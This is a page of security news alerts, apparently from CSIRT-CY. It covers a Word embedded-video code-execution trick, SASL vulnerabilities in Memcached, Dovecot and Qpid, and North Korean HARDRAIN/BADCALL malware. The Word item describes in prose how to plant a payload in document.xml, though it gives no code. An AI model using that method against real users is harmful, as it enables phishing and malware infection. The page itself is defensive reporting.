Alerts

Microsoft Word documents can potentially smuggle in malicious code using embedded web videos, it is claimed. Opening a booby-trapped file, and clicking on the vid, will trigger execution of the code.

In summary, miscreants can leverage this weakness to potentially trick marks into installing malware on their PCs. It’s useful for hackers preying on non-savvy phishing targets, and the like.

Seeing as there is no official patch for the alleged vulnerability, a workaround is to block files with embedded videos, or use other defenses to prevent dodgy documents from compromising systems and networks.

The alleged flaw was flagged up this week by infosec bods at Cymulate, who claimed a lack of safeguards in the way Redmond’s Office 2016 and earlier handle video material opens a door for remote code execution attacks.

“Attackers could use this for malicious purposes such as phishing, as the document will show the embedded online video with a link to YouTube, while disguising a hidden html/javascript code that will be running in the background and could potentially lead to further code execution scenarios,” Cymulate CTO Avihai Ben-Yossef claimed on Thursday.

“This attack is carried out by embedding a video inside a Word document, editing the XML file named document.xml, replacing the video link with a crafted payload created by the attacker which opens Internet Explorer Download Manager with the embedded code execution file.”

Delivery

So, it works like this: the attacker creates an otherwise normal Word file and, within the text, embeds an online video from YouTube or any other streaming site – the video itself doesn’t matter, here. From there, the attacker unpacks the resulting Docx file, and edits the document.xml file within.

That XML file, the researchers explained, is where the real danger lies. A miscreant can modify the embeddedHTML parameter to redirect the iframe code of the video to any HTML or JavaScript of their choosing.

The .docx is packed up with the twiddled XML code, and sent to a victim, say, via email. When the file is opened in Word, and the mark tricked into clicking on the video iframe, the malicious XML is parsed, sans security warnings, and its malicious code is executed. This could be used to fool people into installing fake Adobe Flash updates that contain spyware.

Microsoft has yet to comment on the claims, nor had a chance to issue a patch or fix, we understand.

In the meantime, to mitigate against this, according to Cymulate, admins can block embedded video or block Word docs that contain an “embeddedHTML” tag. Also, don’t open or trust Word documents from strangers, and don’t run installers that pop up unexpectedly from Office files. ®

Updated to add

Seems Microsoft won’t be addressing this because, as far as it is concerned, the software is working as expected. “The product is properly interpreting HTML as designed – working in the same manner as similar products,” said Jeff Jones, a senior director at Microsoft.

So, as we suggested, don’t open files or links from suspicious or unknown sources, and don’t click to allow stuff to install if anything weird pops up. Meanwhile, apply defense-in-depth mechanisms, and stop compromises from spreading from a single user to the whole network.

 

The information contained in this website is for general information purposes only. The information is gathered from The Register while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

Simple Authentication and Security Layer (SASL) is an authentication layer used in Internet protocols. SASL is not a protocol, but rather a framework that provides developers of applications and shared libraries with mechanisms for authentication, data integrity–checking, and encryption.

Within the framework and a few of its plugins, there are a couple of known vulnerabilities that we want to make you aware of. Although patches have been issued, not everyone has implemented them.

Why would I need to know about SASL?

Most server administrators will recognize the acronym from this type of error message or report:

“SASL LOGIN authentication failed: authentication failure”

Usually the message will contain more details about the failure, depending on the specific software and plugins that you are using. While receiving such a message in itself is not a reason for alarm, if you see it repeatedly and originating from the same IP address, then there is reason to investigate further. Possibly someone is trying to gain access to your server and planning to use it as a spam-box. They might be looking for a way to use your server and your resources to send out a spam campaign.

Countermeasures against brute force attacks

SASL attacks usually turn out to be brute force attacks, meaning an automated script or a bot is trying over and over to log into an existing email account on your server, trying many combinations of credentials to find a valid username and password pair. Thankfully, there are some countermeasures you can take against these attacks.

  • If you have the option to make your server listen on a different port, doing so might make you a less likely target for new attacks.
  • If the SASL message is from the same IP all the time, block that IP in your firewall.
  • If the attackers keep coming at you from different IPs, there are software solutions that use  machine learning to automatically block any new assailant. One caveat to this solution: Be vigilant about false positives so that you don’t shut out legitimate users, such as remote employees.

If you are seeing some of these attacks, there is no reason to feel singled out. There are threat actors out there that constantly sweep the Internet for new servers listening on port 25.

SASL framework

SASL is a framework for application protocols, such as SMTP or IMAP, that adds authentication support. It checks whether the user has the proper permissions to use the server in the way they request. It also offers a framework for data integrity–checking and encryption.

For a better understanding of how the framework actually works and where the vulnerabilities throw a wrench in the process, we want to give you some background about the flow of information between server and clients.

Client and server applications make calls to their local copies of the SASL library, or libsasl, through the SASL API. The libsasl then communicates with the SASL mechanisms through the SASL service provider interface (SPI).

The following diagram shows steps in the SASL life cycle. The client actions are shown on the left and the server actions on the right. The arrows in the middle show interactions between the client and server over an external connection.

Memcached vulnerability

Memcached is a software package that implements a high-performance caching server for storing chunks of data obtained from database and API calls in RAM. This helps speed up dynamic web applications, making it well suited for large websites and big-data projects.

In 2016, security researchers from Cisco’s Talos found three remote code execution vulnerabilities. All of these flaws affected memcached’s binary protocol for storing and retrieving data, and one of them was in the Simple Authentication and Security Layer (SASL) implementation. These vulnerabilities were fixed by Memcached later that year, but there has been a bad adoption rate.

Dovecot server vulnerabilities

A Denial of Service vulnerability was found in the SASL authentication component of the Dovecot server. Remote attackers can crash vulnerable systems due to a validation error when the vulnerable software handles a crafted username when processing SASL authentication if the auth-policy component has been activated. The vulnerable versions were 2.2.25 through 2.2.26.1, and unfortunately some of these are still in active use.

Another flaw was found in Dovecot 2.0 up to 2.2.33 and 2.3.0. An abort of SASL authentication results in a memory leak in the Dovecot auth client used by login processes. The leak has an impact on high-performance configurations where the same login processes are reused and can cause the process to crash due to memory exhaustion.

More recent vulnerabilities

A more recent vulnerability was found in Apache Qpid Broker. Both the Qpid broker and Qpid clients use the Cyrus SASL library, a full-featured authentication framework, which offers many configuration options. An authentication of incoming AMQP connections in Apache Qpid Broker-J is performed by special entities called “Authentication Providers.” Each Authentication Provider can support several SASL mechanisms, which are offered to the connecting clients as part of SASL negotiation process.

The vulnerability that was discovered is a Denial of Service vulnerability, and it was found in Apache Qpid Broker-J 7.0.0 in the functionality for authentication of connections for AMQP protocols 0-8, 0-9, 0-91, and 0-10 when either PLAIN or XOAUTH2 SASL mechanism is used. The vulnerability allows an unauthenticated attacker to crash the Broker instance.

 

The information contained in this website is for general information purposes only. The information is gathered from Malwarebytes while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website, you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.

Hidden Cobra malware infects Android devices with RAT, turns Windows machines into proxies

The Department of Homeland Security (DHS) and FBI on Tuesday jointly released two new reports analyzing trojan malware attributed to Hidden Cobra, aka Lazarus Group — a threat actor widely believed to be sponsored by the North Korean government.

The two malware packages, referred to as HARDRAIN and BADCALL, can install a remote access tool (RAT) payload on Android devices, and force infected Windows systems to act as a proxy server, disguising their command-and-control communications to appear as if they are encrypted TLS/SSL (HTTPS) sessions.

According to the DHS and FBI, HARDRAINis composed three malicious executable files. The first two are 32-bit, Windows-based dynamic link library (DLL) executables, which configure the Windows Firewall to allow incoming connections, thus allowing machines to function as proxies. Illicit communications are masked as HTTPS sessions by leveraging public certificates sourced from legitimate Internet services. In reality, however, the traffic is actually encrypted using an unidentified algorithm.

Accompanying these two DLL files is an Android-based Executable Linkable Format (ELF) file that connects to hard-coded Internet Protocol (IP) addresses and acts as a RAT program.

BADCALL is also composed of three separate files — and as with HARDRAIN, the first two are Windows executables designed to disable the firewall (by modifying a registry key) and transform infected systems into proxy servers. They, too, disguise malicious C2 communications as encrypted HTTPS traffic, but in actuality they encrypt their activity using a rudimentary cipher (XOR/ADD and SUB/XOR, respectively).

The third file, meanwhile, is an Android Package Kit (APK) that, according to the BADCALL report, acts as a RAT program “capable of recording phone calls, taking screenshots using the device’s embedded camera, reading data from the contact manager, and downloading and uploading data from the compromised Android device.” It can also execute commands and scan for open Wi-Fi channels.

 

The information contained in this website is for general information purposes only. The information is provided by SC Magazine and while we endeavour to keep the information up to date and correct, we make no representations or warranties of any kind, express or implied, about the completeness, accuracy, reliability, suitability or availability with respect to the website or the information, products, services, or related graphics contained on the website for any purpose. Any reliance you place on such information is therefore strictly at your own risk.
Through this website you are able to link to other websites which are not under the control of CSIRT-CY. We have no control over the nature, content and availability of those sites. The inclusion of any links does not necessarily imply a recommendation or endorse the views expressed within them.
Every effort is made to keep the website up and running smoothly. However, CSIRT-CY takes no responsibility for, and will not be liable for, the website being temporarily unavailable due to technical issues beyond our control.